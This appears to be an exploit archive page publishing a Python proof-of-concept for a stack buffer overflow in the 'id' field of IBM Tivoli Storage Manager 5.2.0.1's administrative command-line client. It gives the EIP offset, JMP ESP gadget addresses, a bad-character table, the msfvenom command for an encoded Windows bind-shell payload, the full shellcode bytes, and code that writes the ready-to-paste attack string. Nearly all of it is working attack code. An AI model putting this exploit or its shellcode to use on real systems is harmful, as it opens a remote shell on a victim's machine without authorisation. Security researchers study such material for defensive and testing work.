exploit the possibilities

IBM Tivoli Storage Manager 5.2.0.1 Buffer Overflow

IBM Tivoli Storage Manager 5.2.0.1 Buffer Overflow
Posted Nov 20, 2020
Authored by Paolo Stagno

IBM Tivoli Storage Manager version 5.2.0.1 suffers from a command line administrative interface buffer overflow vulnerability.

tags | exploit, overflow
MD5 | 4a0e4ac1048da1123852d71eb40c733b

IBM Tivoli Storage Manager 5.2.0.1 Buffer Overflow

Change Mirror Download
# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow
# Exploit Author: Paolo Stagno aka VoidSec
# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html
# Version: 5.2.0.1
# Tested on: Windows 10 Pro v.10.0.19041 Build 19041

"""
Usage: IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER"

PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1
PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe"
FileName : dsmadmc.exe
ARCH : I386
DotNET : False
ASLR : True
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : False
ControlFlowGuard : False
HighentropyVA : False
"""

# [ buffer ]
# [ 68 byte | EIP | rest of the buffer ]
# ^_ESP
"""
EIP contains normal pattern : 0x33634132 (offset 68)
ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)

JMP ESP Pointers:
0x028039eb : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02803d7b : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02852c21 : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fbe3 : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fd2f : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x028823a9 : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
"""

#!/usr/bin/python
import struct

# 4000 bytes
buff_max_length=800
eip_offset=68
"""
BAD CHARS: \x00\x08\x09\x0a\x0d\x1a\x1b\x7f

GOOD CHARS:
asciiprint \x20-\x7e

MOD CHARS:
\x00 -> \x20
,-----------------------------------------------.
| Comparison results: |
|-----------------------------------------------|
| 80 81 82 83 84 85 86 87| File
| 3f 3f 2c 9f 2c 2e 2b d8| Memory
80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File
|5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory
90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File
|7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory
a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File
|22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory
b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File
|2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory
c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File
|45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory
d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File
|4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory
e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File
|8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory
f0 |f8 f9 fa fb fc fd fe ff | File
|6f 97 a3 96 81 79 5f 98 | Memory
`-----------------------------------------------'
"""
# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "\x00\x08\x09\x0a\x0d\x1a\x1b\x7f" -e x86/alpha_mixed BufferRegister=ESP --smallest
shellcode = b""
shellcode += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x78"
shellcode += b"\x6b\x4d\x4b\x6b\x69\x62\x54\x61\x34\x6a\x54"
shellcode += b"\x76\x51\x6a\x72\x6c\x72\x54\x37\x45\x61\x4f"
shellcode += b"\x39\x61\x74\x4e\x6b\x62\x51\x66\x50\x6c\x4b"
shellcode += b"\x53\x46\x34\x4c\x6c\x4b\x32\x56\x35\x4c\x6e"
shellcode += b"\x6b\x67\x36\x37\x78\x6e\x6b\x43\x4e\x51\x30"
shellcode += b"\x4c\x4b\x67\x46\x74\x78\x50\x4f\x72\x38\x42"
shellcode += b"\x55\x6c\x33\x30\x59\x56\x61\x38\x51\x39\x6f"
shellcode += b"\x49\x71\x73\x50\x4e\x6b\x70\x6c\x31\x34\x54"
shellcode += b"\x64\x6e\x6b\x73\x75\x67\x4c\x4e\x6b\x66\x34"
shellcode += b"\x46\x48\x74\x38\x45\x51\x69\x7a\x4c\x4b\x31"
shellcode += b"\x5a\x67\x68\x6e\x6b\x42\x7a\x51\x30\x46\x61"
shellcode += b"\x6a\x4b\x68\x63\x36\x54\x47\x39\x6c\x4b\x35"
shellcode += b"\x64\x6c\x4b\x67\x71\x5a\x4e\x74\x71\x6b\x4f"
shellcode += b"\x64\x71\x6f\x30\x59\x6c\x6c\x6c\x6f\x74\x39"
shellcode += b"\x50\x50\x74\x43\x37\x49\x51\x58\x4f\x34\x4d"
shellcode += b"\x77\x71\x6f\x37\x5a\x4b\x6c\x34\x35\x6b\x53"
shellcode += b"\x4c\x35\x74\x35\x78\x73\x45\x48\x61\x6c\x4b"
shellcode += b"\x42\x7a\x75\x74\x66\x61\x5a\x4b\x50\x66\x4c"
shellcode += b"\x4b\x46\x6c\x70\x4b\x4e\x6b\x31\x4a\x77\x6c"
shellcode += b"\x76\x61\x68\x6b\x4e\x6b\x53\x34\x6c\x4b\x53"
shellcode += b"\x31\x4a\x48\x4e\x69\x37\x34\x56\x44\x65\x4c"
shellcode += b"\x70\x61\x38\x43\x4f\x42\x45\x58\x61\x39\x38"
shellcode += b"\x54\x6f\x79\x48\x65\x4f\x79\x59\x52\x43\x58"
shellcode += b"\x4c\x4e\x32\x6e\x36\x6e\x7a\x4c\x72\x72\x49"
shellcode += b"\x78\x4f\x6f\x4b\x4f\x6b\x4f\x6b\x4f\x4e\x69"
shellcode += b"\x42\x65\x54\x44\x6f\x4b\x73\x4e\x68\x58\x4b"
shellcode += b"\x52\x44\x33\x6c\x47\x75\x4c\x37\x54\x42\x72"
shellcode += b"\x4d\x38\x6e\x6e\x69\x6f\x59\x6f\x49\x6f\x6d"
shellcode += b"\x59\x57\x35\x73\x38\x70\x68\x32\x4c\x52\x4c"
shellcode += b"\x67\x50\x71\x51\x75\x38\x65\x63\x76\x52\x76"
shellcode += b"\x4e\x42\x44\x61\x78\x34\x35\x54\x33\x71\x75"
shellcode += b"\x73\x42\x70\x30\x79\x4b\x6b\x38\x61\x4c\x31"
shellcode += b"\x34\x57\x7a\x4c\x49\x59\x76\x31\x46\x69\x6f"
shellcode += b"\x33\x65\x67\x74\x4f\x79\x6a\x62\x32\x70\x6d"
shellcode += b"\x6b\x4d\x78\x6f\x52\x42\x6d\x4f\x4c\x6f\x77"
shellcode += b"\x55\x4c\x75\x74\x53\x62\x79\x78\x61\x4f\x79"
shellcode += b"\x6f\x6b\x4f\x79\x6f\x30\x68\x42\x4f\x62\x58"
shellcode += b"\x63\x68\x77\x50\x73\x58\x70\x61\x30\x67\x33"
shellcode += b"\x55\x50\x42\x43\x58\x32\x6d\x70\x65\x61\x63"
shellcode += b"\x32\x53\x76\x51\x69\x4b\x6d\x58\x33\x6c\x51"
shellcode += b"\x34\x35\x5a\x4b\x39\x6b\x53\x72\x48\x70\x58"
shellcode += b"\x47\x50\x55\x70\x57\x50\x42\x48\x62\x50\x63"
shellcode += b"\x47\x70\x6e\x35\x34\x34\x71\x6f\x39\x4c\x48"
shellcode += b"\x30\x4c\x74\x64\x67\x74\x6e\x69\x4b\x51\x54"
shellcode += b"\x71\x58\x52\x62\x72\x36\x33\x62\x71\x71\x42"
shellcode += b"\x79\x6f\x68\x50\x74\x71\x79\x50\x76\x30\x69"
shellcode += b"\x6f\x50\x55\x54\x48\x41\x41"

buff = ""
buff += "A" * eip_offset
buff += struct.pack("<I",0x02c73d7b) # 0x02803d7b cause char modification needs to be written as 0x02c73d7b
buff += shellcode
buff += "C" * (buff_max_length - len(buff))

print("Writing {} bytes".format(len(buff)))
f = open("IBM_TSM_v.5.2.0.1_exploit.txt", "w")
f.write(buff)
f.close()
Login or Register to add favorites

File Archive:

December 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    22 Files
  • 2
    Dec 2nd
    33 Files
  • 3
    Dec 3rd
    16 Files
  • 4
    Dec 4th
    22 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close